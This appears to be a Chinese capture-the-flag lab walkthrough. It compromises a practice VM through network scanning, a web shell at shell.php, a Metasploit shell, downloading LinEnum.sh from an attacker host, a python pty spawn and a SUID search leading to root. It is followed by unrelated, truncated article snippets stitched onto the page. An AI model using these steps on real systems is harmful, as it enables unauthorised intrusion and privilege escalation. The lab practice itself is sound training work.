1.arp-scan-l或者nmap找靶机ip
2.然后nmap扫描端口
3.访问80端口
4.dirb爆破.php目录
5.访问shell.php
6.执行cmd命令试试,发现可以执行。
7.使用msf进行创建shell
8.使用burp进行url编码
9.然后下载LinEnum.sh,进行爆破
http://192.168.1.32:1234/LinEnum.sh
10.查找有用的信息
1.python -c 'import pty;pty.spawn("/bin/bash")'
2.find/ -perm -u=s -type f 2>/dev/null,查找可以使用的shell
3.进行user3用户目录下,执行。并获得root权限
三:总结:这台靶机一共12种提权方式,希望有时间的朋友可以试试。希望这篇文章可以帮助到你,我也是初学者,希望会的大佬勿喷,如果有错误的地方请指出来,我一定虚心改正。如果有好的 *** ,大家可以分享出来,多多交流。
word文本文档如何设置每张22行每排28个字呢,话说许多 客户都是在资询这个问题呢?下边就来我这儿看下word公文标准文件格式作法流程吧,必须的盆友能够参照下哦。 word文本文档如何设...
不是本人手机通话清单怎么打印(怎样能查一年前的手机通话清单?) 孩子爱玩手机已经成为每一位家长关心的问题,但合理的沟通会让孩子竖起姿势。现在我想和大家分享一下我是如何和howbaby交流看电视的。...
钓鱼网站是什么意思-SQLMap踩坑到怎样雅致地控制子进程 0times;00 情景 nbsp; SQLMap是检验SQL引入系统漏洞认可的武器,其自身并不兼容做为控制模块导进应用,可是出示了s...
用户分层自己并不是目标,只是实现业务成长的手段方法。 用户分层运营,太多文章太多大咖有提到的。较量“百度百科科学式”理论是基于RFM模子。RFM模子现已被遍及深入的运用在传统+互联网企业里,它主要运用...
今天跟大家分享一下常态疫情下的话题营销解构。在全球疫情爆发的情况下,疫情会成为我们经济生活中的常态。 我们这几个月说的最多的话是:没有一个春天不会到来,也没有一个冬天不会离去。在这样一个常态的状况下...
现在微信这一款APP已经成为了我们日常生活当中不可缺少的主要工具,为了能够让这一款APP更好地为我们服务,我们就需要在日常生活当中一定要注意微信的使用方式并且正确操作,那在这些操作中怎么能同步别人的微...